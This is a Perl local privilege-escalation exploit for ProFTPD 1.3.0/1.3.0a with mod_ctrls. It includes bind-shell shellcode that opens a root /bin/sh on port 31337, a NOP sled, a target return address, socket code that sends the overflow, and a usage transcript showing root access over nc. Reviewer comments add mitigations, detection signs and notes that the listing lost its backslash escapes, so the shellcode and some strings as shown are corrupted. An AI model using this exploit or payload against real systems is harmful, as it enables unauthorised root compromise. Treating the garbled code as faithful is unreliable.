
# Title : ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
# Published : 2007-02-18
# Author : Revenge


#!/usr/bin/perl -w
 #
 # $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
 #
 # ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
 # [Old style school sploit against gcc 3.x and linux kernel 2.4]
 #
 # Original Advisory :
 #  http://www.coresecurity.com/?action=item&id=1594
 #
 # [ Exploitation condition ]
 # - proftpd must be compiled with --enable-ctrls option
 # - local user needs permission to connect through unix socket (from proftpd.conf)
 #
 # This one works for 2.4 exploitation against gcc 3.x
 # Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
 # I was able to use only a <bind_shell> as payload, since a normal setuid + execve does not seem to work
 #
 # Tested against:
 # - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
 # *** Against v1.3.0a the server *could* remain up (in a Denial of Service condition) without binding the shell
 #
 # revenge@darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
 # [ wait some secs then nc on port 31337 ]
 # anyone@anywhere:~$ nc <host> 31337
 # id
 # uid=0(root) gid=0(root) groups=50(ftp)
 # exit
 # [ after that server will deactivate ]
 #
 # Alfredo "revenge" Pesoli
 #
 # http://www.0xcafebabe.it/
 # <revenge@0xcafebabe.it>
#

# Flat script: reads a unix-socket path and a target id from @ARGV, builds a
# request buffer and writes it to that socket (steps commented below).
# From the header comment on this page: the issue requires a ProFTPD build
# with --enable-ctrls and a local user allowed to reach the controls socket
# via proftpd.conf, so the two mitigations are to leave ctrls disabled unless
# it is needed and to restrict that socket's access list. The author notes
# that against 1.3.0a the server may simply stop (DoS); a proftpd crash or an
# unexpected listener on port 31337 is the observable sign either way.
# NOTE(review): as reproduced on this page every backslash escape ("\x..",
# "\n", "\"") has lost its backslash, so the string literals below are plain
# ASCII and the listing is not faithful to the original file.
use strict;
use Socket;

# Fewer than two positional arguments: print usage and exit.
# NOTE(review): the &-call form bypasses usage()'s empty prototype; plain
# usage() is the modern spelling.
if ( @ARGV < 2 ) { &usage(); }

# Payload string, described by the author's comment below (see the
# extraction note above about the missing backslashes).
my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80".
"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80".
"x89xc7x31xc9x66xb9x7ax69x52x66x51x43x66x53x89xe1".
"xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd".
"x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3".
"x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88".
"x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d".
"x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68";

my $rsock   = shift;   # first argument: path of the server's unix socket
my $tn      = shift;   # second argument: target id, key into %targets / %tname

my $ret;               # address string selected from %targets
my $nop = "x90"x200;   # the string "x90" repeated 200 times

# Fixed local socket path for bind(). NOTE(review): a predictable path under
# /tmp that is unlink()ed and chmod()ed after the fact is the classic insecure
# temp-file pattern; a private mkdtemp-style directory would avoid it.
use constant LSOCK  => '/tmp/tmp.sock';

# Per-target address, keyed by the id given on the command line.
my %targets = (
   '1' => "x55xefxffxbf" # Slackware 11.0
   # Add here your target RET
);

# Human-readable name per target id; used only for the banner.
my %tname = (
   '1' => "Slackware 11.0"
);

# NOTE(review): no check that $tn is a known key; an unknown id leaves $ret
# undef (a warning under -w) and the banner prints an empty target name.
$ret = $targets{$tn};

# Request body: the NOP string, the payload, then the chosen address x70.
my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);

# NOTE(review): bareword filehandle SOCK; a lexical handle is the usual
# modern style. Failure is reported with $!.
socket (SOCK, PF_UNIX, SOCK_STREAM, 0)  or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);   # packed address of the server socket

unlink LSOCK;                      # drop a stale socket file; result unchecked
my $lfile = sockaddr_un(LSOCK);    # packed address of the local socket

# NOTE(review): the die message interpolates the packed sockaddr ($lfile)
# rather than the path (LSOCK) and omits $!.
bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);              # owner-only mode on the local socket file

connect (SOCK, $rfile) or die "nUnable to connect to ".$rsock."nMaybe server is down or incorrect pathnn";

print "n Request length => ".$l."n";
print " Target => ".$tname{$tn}."n";

# Four writes: three short fixed-format headers built with pack(), then the
# buffer. The field meanings are not documented on this page; presumably
# they follow the mod_ctrls request framing the title refers to (ProFTPD
# source, not shown here). send() return values are not checked.
send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;

close SOCK;   # return value unchecked

print "n [#] Request sent - try to connect on port 31337nn";

# Print the banner and usage text to STDOUT, then exit(). Called from the
# argument check at the top of the script when fewer than two arguments are
# given. NOTE(review): the quotes around revenge on the second print are
# unescaped as shown on this page, so that line does not parse as reproduced
# (the same extraction loss that dropped the "\n" backslashes). The empty
# prototype () is bypassed by the &usage() call site and is best removed.
sub usage() {
   print "n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]n";
   print " Alfredo "revenge" Pesolin";
   print " <revenge@0xcafebabe.it>nn";
   print "Usage : $0 <path_to_unix_socket> <targets>n";
   print "   Ex : $0 /usr/local/var/proftpd/proftpd.sock 1n";
   print "n Available Targets :n";
   print "  1 => 0xbfffef55 (Slackware 11.0)nn";
   exit();
}
